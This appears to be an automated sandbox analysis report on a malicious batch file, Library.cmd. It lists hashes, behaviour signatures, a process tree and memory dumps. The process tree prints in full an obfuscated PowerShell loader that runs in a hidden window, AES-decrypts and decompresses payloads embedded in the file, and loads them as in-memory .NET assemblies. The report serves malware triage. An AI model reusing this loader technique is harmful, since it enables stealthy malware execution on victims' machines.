1a357366ee69f83a9c091ee775a44e5cc0fbc2524a50332f9ed261f9ca2d727b

Resubmissions

25/07/2024, 23:32

240725-3jrj5sverf 8

25/07/2024, 19:34

240725-x96h4azenm 8

25/07/2024, 17:53

240725-wgedgaveml 8

25/07/2024, 17:32

240725-v4d6jsxekd 8

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
25/07/2024, 17:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Library.cmd
Size

3.3MB
MD5

705ac80b02f73faec8180190bd2b8ce2
SHA1

4f1e20556015edeee8795ea7ef6137b4341b3d80
SHA256

1a357366ee69f83a9c091ee775a44e5cc0fbc2524a50332f9ed261f9ca2d727b
SHA512

da1981a69dee947f2e490c07d452a2881b7a01d09bd6de70ebd9df648db6d8804bbdccff62c40d1a6796ff77ce107cfd01f1dce24369b2b973081c78e5d0de56
SSDEEP

49152:8e90YDSczQOfmBTZ7fSU13LvMeEZng0PJFGrbxM+:0

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2064	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2064	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1996 wrote to memory of 2352	1996	cmd.exe	31
PID 1996 wrote to memory of 2352	1996	cmd.exe	31
PID 1996 wrote to memory of 2352	1996	cmd.exe	31
PID 2352 wrote to memory of 2400	2352	cmd.exe	33
PID 2352 wrote to memory of 2400	2352	cmd.exe	33
PID 2352 wrote to memory of 2400	2352	cmd.exe	33
PID 2352 wrote to memory of 2064	2352	cmd.exe	34
PID 2352 wrote to memory of 2064	2352	cmd.exe	34
PID 2352 wrote to memory of 2064	2352	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Library.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\Library.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\Library.cmd';$aYUO='LEWmKoaEWmKdEWmK'.Replace('EWmK', ''),'FEbiYrEbiYomBEbiYaseEbiY64EbiYStrEbiYinEbiYgEbiY'.Replace('EbiY', ''),'Invkamvokamvkkamvekamv'.Replace('kamv', ''),'TrvTXdavTXdnvTXdsfvTXdovTXdrmvTXdFinvTXdalvTXdBlovTXdckvTXd'.Replace('vTXd', ''),'CojZDOpjZDOyTjZDOojZDO'.Replace('jZDO', ''),'SplzVMQitzVMQ'.Replace('zVMQ', ''),'GeRWEbtRWEbCuRWEbrreRWEbntRWEbPrRWEboceRWEbsRWEbsRWEb'.Replace('RWEb', ''),'ChNhmQaNhmQnNhmQgeENhmQxNhmQtenNhmQsiNhmQonNhmQ'.Replace('NhmQ', ''),'EnoyyatoyyaryoyyaPooyyainoyyatoyya'.Replace('oyya', ''),'ElxdPsexdPsmxdPsenxdPstxdPsAtxdPs'.Replace('xdPs', ''),'Dblyiecblyiomblyipblyirblyieblyisblyisblyi'.Replace('blyi', ''),'MaAIfzinAIfzMoAIfzduAIfzleAIfz'.Replace('AIfz', ''),'RearCLadarCLLiarCLnesarCL'.Replace('arCL', ''),'CqIOIreaqIOItqIOIeDqIOIeqIOIcrqIOIypqIOItoqIOIrqIOI'.Replace('qIOI', '');powershell -w hidden;function IocxM($diQol){$NvznA=[System.Security.Cryptography.Aes]::Create();$NvznA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NvznA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NvznA.Key=[System.Convert]::($aYUO[1])('kL1UBtUuFDE9V9LM/Uk/WvdRxJsjj9H6CX3jPEUZ+No=');$NvznA.IV=[System.Convert]::($aYUO[1])('jvlbrCPvcqHagDjBk0TemQ==');$cPnJJ=$NvznA.($aYUO[13])();$gpChW=$cPnJJ.($aYUO[3])($diQol,0,$diQol.Length);$cPnJJ.Dispose();$NvznA.Dispose();$gpChW;}function uBxZK($diQol){$RwHhF=New-Object System.IO.MemoryStream(,$diQol);$fYqcC=New-Object System.IO.MemoryStream;$dpVKq=New-Object System.IO.Compression.GZipStream($RwHhF,[IO.Compression.CompressionMode]::($aYUO[10]));$dpVKq.($aYUO[4])($fYqcC);$dpVKq.Dispose();$RwHhF.Dispose();$fYqcC.Dispose();$fYqcC.ToArray();}$iBXfm=[System.IO.File]::($aYUO[12])([Console]::Title);$Hnkcn=uBxZK (IocxM ([Convert]::($aYUO[1])([System.Linq.Enumerable]::($aYUO[9])($iBXfm, 5).Substring(2))));$AFLeb=uBxZK (IocxM ([Convert]::($aYUO[1])([System.Linq.Enumerable]::($aYUO[9])($iBXfm, 6).Substring(2))));[System.Reflection.Assembly]::($aYUO[0])([byte[]]$AFLeb).($aYUO[8]).($aYUO[2])($null,$null);[System.Reflection.Assembly]::($aYUO[0])([byte[]]$Hnkcn).($aYUO[8]).($aYUO[2])($null,$null); "
    3⤵
    PID:2400
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2064

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2064-4-0x000007FEF594E000-0x000007FEF594F000-memory.dmp

Filesize
4KB

Download
memory/2064-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2064-6-0x0000000001D60000-0x0000000001D68000-memory.dmp

Filesize
32KB

Download
memory/2064-7-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download
memory/2064-8-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download
memory/2064-9-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download
memory/2064-10-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download